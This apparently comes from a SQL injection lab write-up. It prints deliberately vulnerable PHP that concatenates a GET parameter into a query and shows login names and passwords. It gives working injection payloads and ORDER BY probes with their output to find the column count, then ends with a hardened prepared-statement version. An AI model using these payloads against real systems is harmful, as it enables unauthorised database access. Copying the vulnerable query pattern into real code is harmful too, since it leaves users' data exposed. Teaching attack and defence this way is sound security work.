View the source code:
<?php
// Lab source, deliberately vulnerable: $id is wrapped in double quotes and
// concatenated straight into the SQL text. The assignment from $_GET and the
// query execution were not shown in the excerpt and are restored here so the
// snippet runs; $con is the lab's mysqli connection.
if (isset($_GET['id'])) {
    $id = $_GET['id'];                         // untrusted value from the query string
    $id = '"' . $id . '"';                     // wrapped in double quotes, hence the ") in the payload
    $sql = "SELECT * FROM users WHERE id=($id) LIMIT 0,1";
    $result = mysqli_query($con, $sql);
    $row = $result ? mysqli_fetch_array($result) : false;
    if ($row) {
        echo 'Your Login name:' . $row['username'];
        echo 'Your Password:' . $row['password'];
    } else {
        print_r(mysqli_error($con));           // empty string when the query ran but matched no row
    }
}
Input arrives via GET, and the injection takes the form ?id=1") and 1=1 --+ . When the injected condition is true the page shows Your Login name: and Your Password:; when it is false nothing is shown (the query runs without error but matches no row, so mysqli_error() returns an empty string). Only a malformed query, such as ORDER BY on a column that does not exist, prints a database error.
Number of columns:
?id=1") order by 1 --+
Your Login name:Dumb
Your Password:Dumb
?id=1") order by 2 --+
Your Login name:Dumb
Your Password:Dumb
?id=1") order by 3 --+
Your Login name:Dumb
Your Password:Dumb
?id=1") order by 4 --+
Unknown column '4' in 'order clause'
So the number of columns is 3.
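The same lookup with the input bound as a parameter instead of concatenated, as an added example that is not part of the lab's code. It assumes $con is an open mysqli connection (with mysqlnd, so get_result() is available) and the lab's users(id, username, password) table; it closes both the boolean oracle and the ORDER BY error oracle used above.

```php
<?php
// Hardened replacement for the lab's query (added example, not lab code).
// Assumes: $con is an open mysqli connection, table users(id, username, password).
function lookupUser(mysqli $con, string $rawId): ?array
{
    // Accept only a plain decimal integer. Anything containing a quote,
    // a parenthesis or a comment sequence is rejected before reaching SQL.
    if (!preg_match('/^\d+$/', $rawId)) {
        return null;
    }
    $id = (int) $rawId;

    // The id travels as a bound parameter, never as part of the SQL text,
    // so the statement's structure cannot be altered by the input.
    $stmt = $con->prepare('SELECT username FROM users WHERE id = ? LIMIT 1');
    if ($stmt === false) {
        error_log('prepare failed: ' . $con->error);   // logged server-side only
        return null;
    }
    $stmt->bind_param('i', $id);
    if (!$stmt->execute()) {
        error_log('execute failed: ' . $stmt->error);  // never echoed to the client
        $stmt->close();
        return null;
    }
    $result = $stmt->get_result();
    $row = $result ? $result->fetch_assoc() : null;
    $stmt->close();
    return $row ?: null;
}

if (isset($_GET['id'])) {
    $row = lookupUser($con, (string) $_GET['id']);
    if ($row) {
        // Password is no longer selected or displayed; output is HTML-escaped.
        echo 'Your Login name: ' . htmlspecialchars($row['username'], ENT_QUOTES, 'UTF-8');
    } else {
        // One generic response for "no such user" and for any database error,
        // so the page no longer reveals whether a query failed or merely matched nothing.
        echo 'No matching user.';
    }
}
```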